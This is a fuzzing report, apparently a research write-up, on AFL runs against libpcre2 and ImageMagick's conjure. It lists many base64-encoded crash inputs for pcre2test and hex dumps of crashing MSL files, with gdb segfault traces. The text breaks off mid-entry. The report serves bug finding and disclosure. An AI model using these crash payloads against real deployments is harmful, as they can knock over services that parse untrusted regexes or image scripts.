libpcre2 fuzzing

Target

URL: svn://vcs.exim.org/pcre2/code/trunk
Relative URL: ^/code/trunk
Repository Root: svn://vcs.exim.org/pcre2
Repository UUID: 6239d852-aaf2-0410-a92c-79f79f948069
Revision: 610
Node Kind: directory
Schedule: normal
Last Changed Author: ph10
Last Changed Rev: 610
Last Changed Date: 2016-11-27 08:14:33 -0800 (Sun, 27 Nov 2016)

Source code of setup, setup and results @ https://github.com/alfredfarrugia/libpcre2-fuzzing

Environment

Linux trusty64 3.16.0-55-generic #74~14.04.1-Ubuntu SMP Tue Nov 17 10:15:59 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux

setup

cd /tmp
svn co svn://vcs.exim.org/pcre2/code/trunk pcre2
cd pcre2
autoreconf -i
CC=afl-clang-fast CXX=afl-clang-fast++ ./configure --prefix=/opt/fuzzable-pcre2 --enable-debug
make
make install

fuzzing methodology

afl-fuzz -x dict/regex -i input/pcre2test -o /tmp/findings/pcre2test /opt/fuzzable-pcre2/bin/pcre2test

crashing payloads

The crashes found so far are recursion bugs which produces a segmentation fault.

crash reproduction:
	echo "Lyg/Pi4pKhAwGDldKyhKfC0pLwpKfNFden//WzAt0V0rUy3Rf0Q2Xjl6eS16MDCvr68wMK+vr6+vr6+vr68wMH0oYXxiXFthLX16XXswMDYwMDB9Cg==" | base64 -d | bin/pcre2test


Program received signal SIGSEGV, Segmentation fault.
0x00007ffff7b20d94 in match (eptr=, ecode=, mstart=, offset_top=, mb=, eptrb=, rdepth=2) at src/pcre2_match.c:759
759	utf = (mb->poptions & PCRE2_UTF) != 0;

All discovered payloads:

echo "Lyg/Pi4pKhAwGDldKyhKfC0pLwpKfNFden//WzAt0V0rUy3Rf0Q2Xjl6eS16MDCvr68wMK+vr6+vr6+vr68wMH0oYXxiXFthLX16XXswMDYwMDB9Cg==" | base64 -d | bin/pcre2test
echo "Lyg/Pi4pKlswCkp80V1tf/9bMC3RXStTXT8rWzAt0X9ENl45GDldKyhKfC0pLwpKfNFden//WzAt0V0rU10/K1swLdF/RDZeOXp5LXowMK+vr6+vr6+vr68wMH0oYXxiXFthLX16XXswMDYwMDB9Cg==" | base64 -d | bin/pcre2test
echo "Lyg/Pi4pKlswGDldKyhKfC0pLwpKfNFden//Wxwt0V0rU10/K1swLdF/RDZeOXp5LXowMK+vr6+vr6+vr68wL30oYXxiXFthLX16XXswMDYwMDB9Cg==" | base64 -d | bin/pcre2test
echo "Lyg/Pi4pKlswGDldKyhKfC0pLwot0X9ENl45enktejAwr6+vr6+vr6+vrzAwfT9hfGJcW2EtfXpdezAwNjAwMH0K" | base64 -d | bin/pcre2test
echo "Lyg/Pi4pKlthFXpdezMsLwo4WzBhfGJcXVxvezAwMDA1MDAwMDAwMFIoYXxiXFuALTMgfSMsfHx8a2tra2tra2tra2tra2tra2tra2tra2t8m3x8fHx8fHx8fHwtel17MDAwNzAwfQo=" | base64 -d | bin/pcre2test
echo "Lyg/Pi4pKlthFXpdezMsLwo4WzBhfGJcXVxvezAwMTA1MDAwMDAwMH0oYXxiXFthLTMgfSMsfHx8a2tra2tra2tra2tra2tra2traWtra2t8m3x8fHx8fHx8fHwtel17MDAwNzAwfQo=" | base64 -d | bin/pcre2test
echo "Lyg/fC4pK1teLV0zMH3KwNfKysdhLXqMcjN8YmkvCmEteiddemEtel1yM9ADS3szIC8yW14tekN7I2B8fAJwcC1dMzB9ysDXysrHYS16jHBwcHCNcHB8YlxbYWF8W2EtMw59Iyx8fHyGbXAt/Q5/Iw18fHx8pnx8inxwcHBwcHBweHBwfHx8fHz/gIhdezAwMDQwMH0K" | base64 -d | bin/pcre2test
echo "Lyg/fC4pK1teLV0zMH3KwNfKysdhLXqMcjN8YlovCmEteiddemEtel1yM9ADS3szIC8yW14tekN7I2B8fAJwcHBwcHCNcHB8YlxbYWF8W2EtMw59Iyx8fHxwW3At/Q5/Iw18fHx8pnx8inxwcHBwcHBwcHBwfHx8XHz/gIhdezAwMDQwMH0K" | base64 -d | bin/pcre2test
echo "Lyg/fC4pK1teLV0zMHAt/Q5/Iw18fHx8pnx8inxwcHBwcHBwcHBwfHx9ysDXysrHYS16jHIzfGJpLwphLXonXXphLXpdcjPQA0t7MyAvMlteLXpDZCNgfHwCcHBwcHBwjXB7fGJcW2FhfFthLTMOfSMsfHx8cFtwLf0OfyMNfHx8fKZ8fIp8cHCDcHBwcHBwcHx8fHx8/4CIXXswMDA0MDB9Cg==" | base64 -d | bin/pcre2test
echo "LygxfC4pK1teLV0zMH3KwNfKysdhLXqMcjN8YmkvCmEteiddemEtel1yM9ADS3szIC8yW14tekN7Dn8jDXx8fHymfHyKfHBwcHBwcHBwcHB8fHwjYHx8AnBwcHBwcI1wcHxiXFthYXxbYS0zDn0jLHx8fHBbcC39Dn8jDXx8fHymfHyKfHBwcHBwcHBwcHB8fHx8fP+AiF17MDAwNDAwfQo=" | base64 -d | bin/pcre2test
echo "LyhjP1wxKmE/XFZ8PSkqP3YxKj9cV0MvCksD6G1d/31hLH1ONpNDK1r/f/8iXFthLTMgfSMsfGtra2tra3ybfHx8fHx8fHx8fC16XXswMDA3MDB9Cg==" | base64 -d | bin/pcre2test
echo "LyhjP1wxKmE/XFZ8PSkqP3YxKj9cV0MvCksD6G1d/31hbH1ONpNDK1r/CwtiXFthLTMgfSMs/////2tra3ybfHx8fHx8fHx8fC16XXswMDA3MDB9Cg==" | base64 -d | bin/pcre2test
echo "LyhjP1wxKoI/XFZ8PSkqP3YxKj9cV0MvCksD6G1d/31hLH1ONpNDK1r/CwtiXFthLTMgfSMsfGtra2tra3ybfHx8Xnx8fHx8fC16XXswMDA3MDB9Cg==" | base64 -d | bin/pcre2test
echo "LygufDopKj9cMSpFXFYuLjV7OX0UfGcwMDQwMCg6bGJzJS5sYikvCn0oYXxbYRAzDn0jLHx8fHymfHx8fAJwcHBwcHBwcHB8YlxbYWF8W2EtMw59Iyx8fHx8pnx8fHxwcHBwcHBwcHAt/Q59Iyx8fHx8pnx8fHx8W2EtMw59Iyx8fHx8pnx8fHxwcHBwcHBwcHBwcHBwcHBwcHB8fHx8fP+Ael17MDAwNDAwfQo=" | base64 -d | bin/pcre2test
echo "LyiZXStTfC4pK1otP1xSezUsMzB9ykp6P0p6emBdJHzd3WkvCmkthQpKej+ZXStTfC4pK1wtP1z/fzUsMzB9ykp6cHBwcHB8YlxbYWF8W2EtMw59Iyx8fHxwW3At/Q5wcHCScHBwhXAVIHx8fHz/gHpdezAwMDQwMH1I" | base64 -d | bin/pcre2test
echo "LyiZXStTfC4pK1wtP1xSezUsMzB9ykp6P0p6elpdJHzd3WkvCmkthQpKej9KenpgXSR83YBpej9KI2B8fAIgcHBwcHBwcH58YlxbYWF8W2EtMw59Iyx8fHxwW3At/Q5wcHBwcHBmhXBwfHx8fHz/gHpdezAwMDQwMH1I" | base64 -d | bin/pcre2test
echo "Lyg/fC4pKmQtOVlAOV08fIMwel4tLwpbYXx8fHx8fHxeLUMrU14tf/9DeyMsWzAn0V0rW14tekN7I4xffAJwcHBwcHBwcHB9YlxbYWF8W2EtMw59Iyx8fH18pnx8fHxwcHBwcHBwcHAt/Q59Iyx8fKZ8fHx8cHBwcHBwcHBncHx8fHx8/4BhXXswMDA0MDB9Cg==" | base64 -d | bin/pcre2test
echo "Lyg/fC4pKnx8fHxAOV08fINMel4tLwpbYXx8fHx8fHxeLUMrU14tf/9DeyMsWzAx0V0rW14tekN7I4x8fAJwcHBwcHBwcHB9YlxbYWF8W2EtMw59Iyx8fH18pnx8fHxwcHBwcHBwcHAt/Q59Iyx8fKZ8fHx8cHBwcHBwcHBncHx8fHx8/4BhXXswMDA0MDB9Cg==" | base64 -d | bin/pcre2test
echo "Lyg/fC4pKig/fC4pKz98gXx8KHEPY3x8fKZ8fHx8cHBwcHBwcHBwLf0OfSMsfHx8fKYpLwopLwooP3suKSo/fIF8fCl6PXsjLFswKdFdK1teLXpDe/9/fHwCcGJwcHBwcHBwfGJcW2FhfFthLTMOfSMsfHx8fHxwcHBwcHBwcHAt/Q59Iyx8fHx8pnx8fHxwfHx8fP+Ael17MDAwNDAwfQo=" | base64 -d | bin/pcre2test
echo "Lyg/Pi4pKyhhfGIpLwp9C2t8Yikvf//t/ywtOXgYZgEZekMrXl4tenpDeyMsWzBL0V0yW14tekN7I2B8fAIgcHBwcHBwcHB8YlxbYWF8W3At/Q59Iw18fHx8pnx8inxwcHBwcHBwhXBwfHx8cHBwcHBwhXBwfHx8fHz/gHpdezAwMDQwMH1I" | base64 -d | bin/pcre2test
echo "LygufGIpKiRcMSoQXFMMXS4KS15ukCtDXStdLwpLXm6QK1tjUXIzfExfLwovCl5qYlxdXHx7YlxbYQ1SDn0jLHx0fHybfHx8fHBwcHBwcHBscHB8fHx8o/+Ael17MDAwNDAwfQo=" | base64 -d | bin/pcre2test
echo "LygufGIpKi4+Pj4TKlteLV0vCkp8K3UqfHx8/Hx8ZEMvaWlpCmBhfGJcW2EtMyCHIyx8a2t8/Hx8fC16XXswMDA3MDB9LXpdezAwMDcwMH0K" | base64 -d | bin/pcre2test
echo "Lyg/Pi4pKlxSezgsfShKsLCwsLCwsJAOYikvCkr+DQ0gHDAwciP//2JcW2EtMw59Iyx8fGKAel17MDQwNDAwfQo=" | base64 -d | bin/pcre2test
echo "Lyg/Pi4pKlxSezgsfShKsLCwsLCwsJB8YikvCkr+DQ0gHDAwciNhfGJcW2EtMw59IyxbfCsrKysrKysrKysrKysrKysrKy8rKysrKysrK2KAaF17MDQwNDAwfQo=" | base64 -d | bin/pcre2test
echo "Lyg/fC4pK2kKV1Fyf3xFeS8KLwpeamJcXVx8e2JcW39yKnxFfHyTI9F8fHyFhYWFeS8NUg5SDpMjLHx8fHybfHx8fHBwcHBwcIt8fHyTIyx8fHx8m3x8fAJwcHBwcHCLfHx8fP+Ael17MDAwNDAwfQo=" | base64 -d | bin/pcre2test
echo "Lyg/fC4pK2kKV1Fyf3xFXC8KLwpeamJcXVx8e2JcW39yKnxFhYWFhYWFhYWFhYWFeS8NUg5SDpMjLHx8fHybfHx8fHBwfHx8fJt8fHx8cHBwcHBwi3x8fJMjLHx8fHybfHx8fP+Ael17MDAwNDAwfQo=" | base64 -d | bin/pcre2test
echo "LygufGIpKj9cDSouXFJ7NjJ9Q3x8fHx8fHx8fHx8fHwvbWdpCmD//wqmgF4NDQ0NCQ0NNh+8YpZ8fHx8L21nLFswKdFdK1teLXpDeyN8fHxwcHBweHBwcHBwfGJcW2FhfFthLTMOfXBwcHBwcC39DoEjLHx8fHymfHx8fHBwcHB4cHBwcHB8fHx8fP+Ael17MDAwNDAwfS0=" | base64 -d | bin/pcre2test
echo "LygufGIpKj9cDSouXFJ7NjJ9Q3x8fHx8fHx8fHx8fHwvbWdpCmD//wqmgF4NDQ0NCQ0NNh//CqaAXg0NDQ0JDQ02H7xisbxilnx8fHwvbWcsWzAp0V0rW14tekN7I3x8fAJwcHBwcHBwcHB8YlxbYWF8W2EtMw59cHBwcHBwLf0OfSMsfHx8fKZ8fHx8cHBwcHhwcHBwcHx8fHx8/4B6XXswMDA0MDB9LQ==" | base64 -d | bin/pcre2test
echo "LygufGIpKj9cDSouXFJ7NjJ9Q3xLfHx8fHx8fHx8fHwvbWdpCmD//wqmgF4NDQ0NCQ0NNhy8YpZ8fHx8L21nLFswKdFdK1teLXpDeyN8fHwCcHBwcHBwMHBwfGJcW2FhfFthLTMOfXBwcHBwcC39Dn0jLHx8fHymfHx8fHBwcHB4cHBwcHB8fHN8fP+Ael17MDAwNDAwfS0=" | base64 -d | bin/pcre2test
echo "Lyg/Pi4pKvQ/9Hx7MywvCjhbMGF8YlxdXG97MDAwMDUwMDAw//8wfShhfGJcW2EtMyB9Iyx8fHx8m3x8fHx8fHx8fHxKel17MDIwNzAwfQo=" | base64 -d | bin/pcre2test
echo "Lyg/Pi4pKvQrP/R8ezMsLwo4WzBhfGJcXVxvezAwMDA1MDAwMP/jMIEoYXxiXFthLTMgfSMsfHx8fJt8fHx8fHx8fHx8LXpdezAyMDcwMH0K" | base64 -d | bin/pcre2test
echo "Lyg/Pi4pKvQrP/R8ezMsLwo4WzBhfGJcXf5vezAwMDA1MDAwMP/eMH0oYXxiXFthLTMgfSMsfHx8fJt8fHx8fHx8fHx8LXpdezAyMDcwMH0K" | base64 -d | bin/pcre2test
echo "Lyg/Pi4pKvQrP/R8ezMsLwo4WzBhfGJch4eHh4ddXG9pMDAwMDUwMDAw//8wfShhfGJcW2EtMyB9Iyx8fHx8m3x8fHx8fHx8fHwtel17MDIwNzAwfQo=" | base64 -d | bin/pcre2test
echo "Lyg/Pi4pKvQrP/R8ezMsLwo4WzBhfGJ7XVxvezAwMDA1/zAwMP//MH0oYXxiXFthLTMgfSMsfHx8fJt8fHx8fHx8fHx8LXpdezAyMDcwMH0K" | base64 -d | bin/pcre2test
echo "Lyg/fC4pKlhOKz/02/Tk9PT0XvT0fGIQLwr1fH0+Xmo1MDAwMP//MHMoYXxiXFtxLTMgfSMsfHx8W5t8fHx8fHx8fHx8LXpdezAyMDcwMH0K" | base64 -d | bin/pcre2test
echo "Lyg/fC4pKlxOLwr1fH0+Xmo1MDBEMP//MH0oYXxiXFthLTMgfSMsfHx8fJt8fHx8fHx8fHx8LXpdezAyMDcwMH0K" | base64 -d | bin/pcre2test
echo "Lyg/fC4pKlxOKz/02/Tk9PT0UfT0fGIQLwr1fH0+Xmo1MDAwMP//En0oYXxiXFthLTMgfSMsfHx8fJt8fHx8fHx8fHydLXpdezAyNzAwfQo=" | base64 -d | bin/pcre2test
echo "Lyg/fC4pKlxOKz/02/Tk9PT0XvT0fGIQLwr1fH0+Xmo1MDAwMP//MH0oYXxiXFthXXswMjA3MDB9Ag==" | base64 -d | bin/pcre2test
echo "Lyg/Pi4pKlxwQyv0P1xXezgsfShhfHxiKT8rWytbXi16XS8KWz7ZXS309PT09PT09PT09PT09PT09PT09PT09C16Q3sjfI98AnBwcHBwcHBwcHxiXFthYXxbYS0zDn0jLHx8fGOmfFx8fHBwkyMsfHx8fKZ/fHx8cHBwcHBwcHBwcHx8fHx8/4B6XXswMDA0MDB9Cg==" | base64 -d | bin/pcre2test
echo "LygufC4pKig/fC4pKj98gXx8KGD/YikvCltPKnpdYmlhfHx8fHyQfFt4Yin//5UvRWF8LilAekN7I2B8fAIgcHBwUnBwcHB8YlxbYWF8W2EjKXx8fHymfHyKfHBwcHBwcHCFL3B8fHx8fP8D6F17MDAwNDAwfUg=" | base64 -d | bin/pcre2test
echo "Lyg/Pi4pKlswoJwnJy19XXszOH0oSnxkKS8KSmRbMDw1MDAeMBwwMIAoYXw2XFthW2EVFRUVFRUVFRUVFRUVFRUVFRUVFRUVFRUVFRUVFS1wcHBwcHBwcJNwfHx8fHz/gHpdezAwMDQwMH0K" | base64 -d | bin/pcre2test
echo "LygeHj98LjMqKD98Lis/LikqKSsrCkx7Ma+vXa8BezMse6+vXa8BezMse6+v//h7r3x1aS8KK30wf6BpaWkjLFswKdFdMltXV1dXV1dXfHwCIHBwcHBweHBwfGJcW3xbYS0zDn0jLHx8fHJhfFthLTN/fSMsfHx8cFtwLf0rfSMNfHx8fKbDfIp8cHBwcHBwcIVwcHx8fHx8/4B6XXswMDA0MDB9SA==" | base64 -d | bin/pcre2test
echo "LygufGIpKj9c/yo/Li41ezd9A3znJH7uNC8KKKYzJUiP/10vfRt8+Ct/MGkiCoB/MDQ5Wl5egC97I2B8fAJwcHBwcHBwcHB8YlxbYWF8RWEtMw59Iyx8fHxwW3At/Q59Iw18fHx8pnx8inxwcHBwcHBwYWF8W3x8fHz/gHpdezAwMDQwMH0K" | base64 -d | bin/pcre2test
echo "LygufGIpKj9c/yo/Li41ezd9A3znJH7uNC8KKFIzJUiP/10tfRt8+Ct/MGkiCoB/MP85Wl5egC97I2B8fAJwcHBwcHBwcHB8YlxbYWF8W2EgMw59IywF//8FW3At/Q59Iw18fHx8pnx8inxwcHBwcHBwYWF8W3x8fHz/gHpdezAwMDQwMH0K" | base64 -d | bin/pcre2test
echo "LygufGIpKj9c/yo/Li41ezd6A3znJH7uNC8KKFIzJUiP/10vfRt8+Ct/MGkiCoB/MDQ5Wl5egC97I2B8fAJwcHBwcHBwcHB8YlxbYWF8W2EtMw59BCx8fHxwW3At/Q59Iw18fHx8pnx8inxwcHBwcHBwYWF8W3x8fHz/gHpdezAwMDQwMH0K" | base64 -d | bin/pcre2test
echo "LygufGIpKj9c/yo/Li41ezd9A3znJH7uNC8KKFIzJUiP/10vfRt8+Ct/MGkiCoB/MDQ5Wl5eQFB7I2B8fAJwcHBwcHBwj3B8YlxbLnyA/yo/XP8qYWF8W2EtMw59Iyx8fHxwW3gt/Q59Iw18fHx8pnx8inxwcHZycHBwYWF8W3x8fHz/gHpdezAwMDQwMH0K" | base64 -d | bin/pcre2test
echo "LygufGJmZgX//wVmZmZmZikqUVxSK1199+Iwff8FQStdfyt8fT8HkGL/B5Bi/0QKYi8KfXNALH0oYX5iKS8KW2F8fHx/XFthDTMOfXx8cHBwcHBww2xwcHx8fHx8/4B6XXswMDA0MDB9Cg==" | base64 -d | bin/pcre2test
echo "Lyg/fC4pKi5cSCtcSEoeOTyZfGImAWIuEC8KXmp8ciAgICAgK21nQApggF5dXyWYXXsrW14tekN7I4x8fAJwdHBwcHBwcHB9YlxbYWF8W2EtMw59Iyx8fH18pnx8fHxwcHBwcHBwcHAt/Q59Iyx8fKZ8fHx8cGBwcHBwcHBncHx8fHx8/4BhXXswMDA0MDB9Cg==" | base64 -d | bin/pcre2test
echo "Lyg/Pi7/gD8+fC4pKlteLXpDXi1dK1t6LXpde0EsfShKfGIpLwpsf5V6enp6eyNtfHwCcHBwcHBwcHBwfGJcW2FhfFthLTMOfSMsfH//cFtwLf0OfSMNfHx8fKZ8fIp0cHBwcP9wcHBwcIl8fHx8/4B6XXswMDA0MDB9Cg==" | base64 -d | bin/pcre2test
echo "Lyg/Pi7/gD8+fC4pKlteLXpDXi1dK1t6LXpdezYsfShKfGIpLwpsf5V6enp6eyNtfHwCWXBwcHBwcHBwfGJcW2FhfGVhLTMOfSMsfHx8cFtwLf0OfSMNfHx8fKZ8fIp+cHBwcP9wcHBwcHx8fHx8/4B6XXswMDA0MDB9Cg==" | base64 -d | bin/pcre2test
echo "Lyg/Pi7/gD8+fC4pKlteLXpDXi1dK1t6LXpdxn8sfShKfGIpLwpsf5V6enp6eyNtfHwCcHBwcIZwcHBwfGJcW2FhfFthLSAOfSMsfHx8cFtwLf0OfSMNfHx8fKZ8fIp+cHBwcP9wcHBwcHx8fHx8/4B6XXswMDA0MDB9Cg==" | base64 -d | bin/pcre2test

fuzz testing imagemagick conjure

version

Version: ImageMagick 7.0.3-5 Q16 x86_64 2016-11-02 http://www.imagemagick.org
Copyright: Copyright (C) 1999-2016 ImageMagick Studio LLC
License: http://www.imagemagick.org/script/license.php
Features: Cipher DPC HDRI
Delegates (built-in): bzlib djvu fftw fontconfig freetype gvc jbig jng jpeg lcms lqr lzma openexr png tiff webp wmf x xml zlib

system

dist: Ubuntu 16.04 xenial
linux_distribution: Ubuntu 16.04 xenial
system: Linux
machine: x86_64
platform: Linux-4.4.0-43-generic-x86_64-with-Ubuntu-16.04-xenial
uname: Linux ubuntu-xenial 4.4.0-43-generic #63-Ubuntu SMP Wed Oct 12 13:48:03 UTC 2016 x86_64 x86_64
version: #63-Ubuntu SMP Wed Oct 12 13:48:03 UTC 2016

command

conjure -dimensions 10x10 <filename>

Summary report

SIGSEGV, Segmentation fault 6

filename: id:000000,sig:06,src:000000,op:havoc,rep:4

file content

0000  3C 3F 78 6D 6C 20 76 65 72 73 69 6F 6E 3D 22 31  |<?xml version="1|
0010  2E 30 22 20 65 6E 63 6F 64 69 6E 67 3D 22 55 54  |.0" encoding="UT|
0020  46 2D 38 22 3F 3E 3C 69 6D 61 67 65 20 73 69 7A  |F-8"?><image siz|
0030  65 3D 22 34 30 30 78 34 30 30 22 20 3E 3C 72 65  |e="400x400" ><re|
0040  61 64 20 66 69 6C 65 6E 61 6D 65 3D 22 69 6D 61  |ad filename="ima|
0050  67 65 2E 62 61 73 65 2D 68 65 69 67 68 74 5D 20  |ge.base-height] |
0060  74 6F 20 25 5B 77 69 64 74 67 69 66 22 20 2F 3E  |to %[widtgif" />|
0070  3C 67 65 74 20 77 3D 22 62 61 74 22 20 2F 3E 3C  |<get w="bat" /><|
0080  72 65 73 69 7A 65 20 67 65 6F 6D 65 74 72 79 3D  |resize geometry=|
0090  22 56 56 56 56 56 56 56 56 56 56 56 56 56 20 77  |"VVVVVVVVVVVVV w|
00A0  69 64 74 68 3D 22 77 69 64 74 68 22 20 68 65 69  |idth="width" hei|
00B0  67 68 74 3D 22 68 65 69 67 68 20 2F 3E 3C 70 72  |ght="heigh /><pr|
00C0  69 6E 74 20 6F 75 74 70 75 74 3D 22 7A 65 64 20  |int output="zed |
00D0  66 72 6F 6D 20 25 5B 62 61 73 65 2D 77 69 64 74  |from %[base-widt|
00E0  68 5D 78 25 5B 62 61 73 65 2D 68 65 69 67 68 74  |h]x%[base-height|
00F0  5D 20 74 6F 20 25 5B 77 69 64 74 68 5D 78 25 5B  |] to %[width]x%[|
0100  68 65 69 67 68 74 5D 2E 5C 6E 22 20 2F 3E 3C 77  |height].\n" /><w|
0110  72 69 74 65 20 66 69 6C 65 6E 50 6D 65 3D 22 69  |rite filenPme="i|
0120  6D 61 67 65 2E 70 6E 67 22 20 2F 3E 3C 2F 69 6D  |mage.png" /></im|
0130  61 67 65 3E 0A -- -- -- -- -- -- -- -- -- -- --  |age>.           |

gdb output

[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Program received signal SIGSEGV, Segmentation fault.
0x00000000004a32f4 in CopyMagickString (destination=0x1027f20 "/tmp/findings.conjure//crashes/id:000000,sig:06,src:000000,op:havoc,rep:4", source=0x0, length=4096) at MagickCore/string.c:761
761	    *q=(*p++);

filename: id:000001,sig:06,src:000000,op:havoc,rep:4

file content

0000  3C 3F 78 6D 6C 20 76 65 72 73 69 6F 6E 3D 22 31  |<?xml version="1|
0010  2E 30 22 20 65 6E 63 6F 64 69 6E 67 3D 22 55 54  |.0" encoding="UT|
0020  46 2D 38 22 3F 3E 3C 69 6D 61 67 65 20 73 69 7A  |F-8"?><image siz|
0030  65 3D 22 34 30 30 78 34 30 30 22 20 3E 3C 72 65  |e="400x400" ><re|
0040  61 64 20 66 69 6C 65 6E 61 6D 65 3D 22 20 66 69  |ad filename=" fi|
0050  6C 65 6E 61 69 6E 67 2D 77 69 64 74 68 5D 78 25  |lenaing-width]x%|
0060  5B 62 61 73 74 22 20 2F 3E 3C 72 65 73 69 7A 65  |[bast" /><resize|
0070  20 67 65 6F 6D 65 74 72 79 3D 22 25 5B 64 69 6D  | geometry="%[dim|
0080  22 20 2F 3E 3C 67 65 74 20 77 69 64 74 68 3D 22  |" /><get width="|
0090  77 69 64 74 68 22 20 68 65 69 67 68 74 3D 22 68  |width" height="h|
00A0  65 69 67 68 74 22 20 2F 3E 3C 70 72 69 6E 74 20  |eight" /><print |
00B0  6F 75 74 70 75 74 3D 22 7A 65 64 20 66 72 6F 65  |output="zed froe|
00C0  6E 63 6F 64 69 6E 67 2D 77 69 64 74 68 5D 78 25  |ncoding-width]x%|
00D0  5B 62 61 73 65 2D 68 65 69 67 68 74 5D 20 74 6F  |[base-height] to|
00E0  80 00 00 00 69 64 74 68 5D 78 25 5B 68 65 69 67  |....idth]x%[heig|
00F0  68 74 5D 2E 5C 6E 22 20 2F 3E 3C 77 72 69 74 65  |ht].\n" /><write|
0100  20 66 69 6C 65 6E 61 6D 65 3D 22 69 6D 61 67 65  | filename="image|
0110  2E 70 6E 67 22 20 2F 3E 3C 2F 69 6D 61 67 65 3E  |.png" /></image>|
0120  0A -- -- -- -- -- -- -- -- -- -- -- -- -- -- --  |.               |

gdb output

[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Program received signal SIGSEGV, Segmentation fault.
0x00000000004a32f4 in CopyMagickString (destination=0x1027f20 "/tmp/findings.conjure//crashes/id:000001,sig:06,src:000000,op:havoc,rep:4", source=0x0, length=4096) at MagickCore/string.c:761
761	    *q=(*p++);

filename: id:000002,sig:06,src:000000,op:havoc,rep:2

file content

0000  3C 3F 78 6D 6C 20 76 65 72 73 69 6F 6E 3D 22 31  |<?xml version="1|
0010  2E 30 22 20 65 6E 63 6F 64 69 6E 67 3D 22 55 54  |.0" encoding="UT|
0020  46 2D 38 22 3F 3E 3C 69 6D 61 67 65 20 73 69 7A  |F-8"?><image siz|
0030  65 3D 22 34 30 30 78 34 30 30 22 20 3E 3C 72 65  |e="400x400" ><re|
0040  61 64 20 66 69 6C 65 6E 61 6D 65 3D 22 69 6D 61  |ad filename="ima|
0050  67 25 5B 62 61 73 65 2D 68 65 69 67 68 74 5D 20  |g%[base-height] |
0060  74 6F 20 25 5B 77 69 64 74 68 5D 78 25 5B 65 2E  |to %[width]x%[e.|
0070  67 69 66 22 20 2F 3E 3C 67 65 74 20 77 3D 22 62  |gif" /><get w="b|
0080  61 74 22 20 2F 3E 3C 72 65 73 69 7A 65 20 67 65  |at" /><resize ge|
0090  6F 6D 65 74 72 79 3D 22 25 5B 64 69 6D 22 20 22  |ometry="%[dim" "|
00A0  68 65 69 67 68 74 22 20 2F 3E 3C 70 72 69 6E 74  |height" /><print|
00B0  20 6F 75 74 70 75 74 3D 22 7A 65 64 20 66 72 6F  | output="zed fro|
00C0  6D 20 25 5B 62 61 73 65 2D 77 69 64 74 68 5D 78  |m %[base-width]x|
00D0  25 5B 62 61 73 65 2D 68 65 69 67 68 74 5D 20 74  |%[base-height] t|
00E0  6F 20 25 5B 77 69 64 74 68 5D 78 25 5B 68 65 69  |o %[width]x%[hei|
00F0  67 68 74 5D 2E 5C 6E 22 20 2F 3E 3C 77 72 69 74  |ght].\n" /><writ|
0100  65 20 66 69 6C 65 6E 61 6D 65 3D 22 69 6D 61 67  |e filename="imag|
0110  65 2E 70 6E 67 22 20 2F 3E 3C 2F 69 6D 61 67 65  |e.png" /></image|
0120  3E 0A -- -- -- -- -- -- -- -- -- -- -- -- -- --  |>.              |

gdb output

[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Program received signal SIGSEGV, Segmentation fault.
0x00000000004a32f4 in CopyMagickString (destination=0x1027f20 "/tmp/findings.conjure//crashes/id:000002,sig:06,src:000000,op:havoc,rep:2", source=0x0, length=4096) at MagickCore/string.c:761
761	    *q=(*p++);

filename: id:000003,sig:06,src:000000,op:havoc,rep:4

file content

0000  3C 3F 78 6D 6C 20 76 65 72 73 69 6F 6E 3D 22 31  |<?xml version="1|
0010  2E 30 22 20 65 6E 63 6F 64 69 6E 67 3D 22 55 54  |.0" encoding="UT|
0020  46 2D 38 22 3F 3E 3C 69 6D 61 67 65 20 73 69 7A  |F-8"?><image siz|
0030  65 3D 22 34 30 42 78 34 30 30 22 20 3E 3C 72 65  |e="40Bx400" ><re|
0040  61 64 20 66 69 6C 65 6E 61 6D 65 3D 22 69 6D 61  |ad filename="ima|
0050  67 65 2E 67 25 5B 62 61 73 65 2D 77 69 64 74 68  |ge.g%[base-width|
0060  5D 78 25 5B 62 61 69 66 22 20 2F 3E 3C 67 65 74  |]x%[baif" /><get|
0070  20 77 3D 22 62 61 74 22 20 2F 3E 3C 72 65 73 69  | w="bat" /><resi|
0080  6A 65 20 67 65 6F 6D 65 74 72 79 3D 22 25 5B 64  |je geometry="%[d|
0090  69 6D 22 20 2F 3E 3C 67 65 74 20 77 69 64 74 68  |im" /><get width|
00A0  3D 22 77 69 64 74 68 22 20 68 65 69 67 68 74 3D  |="width" height=|
00B0  22 68 65 69 67 68 74 22 20 2F 3E 3C 70 72 69 6E  |"height" /><prin|
00C0  74 20 6F 75 74 70 75 74 3D 22 7A 65 64 20 66 72  |t output="zed fr|
00D0  6F 6D 20 25 5B 62 61 73 65 2D 77 69 64 74 68 5D  |om %[base-width]|
00E0  78 25 5B 62 61 73 65 2D 68 65 69 67 68 74 5D 20  |x%[base-height] |
00F0  74 6F 20 25 5B 77 69 64 74 68 5D 78 25 5B 68 65  |to %[width]x%[he|
0100  69 67 68 74 5D 2E 5C 6E 22 20 2F 3E 3C 77 72 69  |ight].\n" /><wri|
0110  74 65 20 66 69 6C 65 6E 61 6D 65 3D 22 69 6D 61  |te filename="ima|
0120  67 65 2E 65 69 67 68 74 2F 3E 3C 2F 69 6D 61 67  |ge.eight/></imag|
0130  65 3E 0A -- -- -- -- -- -- -- -- -- -- -- -- --  |e>.             |

gdb output

[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Program received signal SIGSEGV, Segmentation fault.
0x00000000004a32f4 in CopyMagickString (destination=0x1027f20 "/tmp/findings.conjure//crashes/id:000003,sig:06,src:000000,op:havoc,rep:4", source=0x0, length=4096) at MagickCore/string.c:761
761	    *q=(*p++);

filename: id:000004,sig:06,src:000026,op:havoc,rep:2

file content

0000  3C 3F 78 6D 6C 20 76 65 72 73 69 6F 6E 3D 22 31  |<?xml version="1|
0010  2E 30 22 20 65 6E 63 6F 64 69 6E 67 3D 22 55 54  |.0" encoding="UT|
0020  46 2D 38 22 3F 3E 3C 69 6D 61 67 65 20 63 69 7A  |F-8"?><image ciz|
0030  65 3D 22 34 30 30 78 34 30 30 22 20 3E 3C 72 65  |e="400x400" ><re|
0040  61 64 20 66 69 6C 65 6E 61 6D 65 3D 22 69 65 2D  |ad filename="ie-|
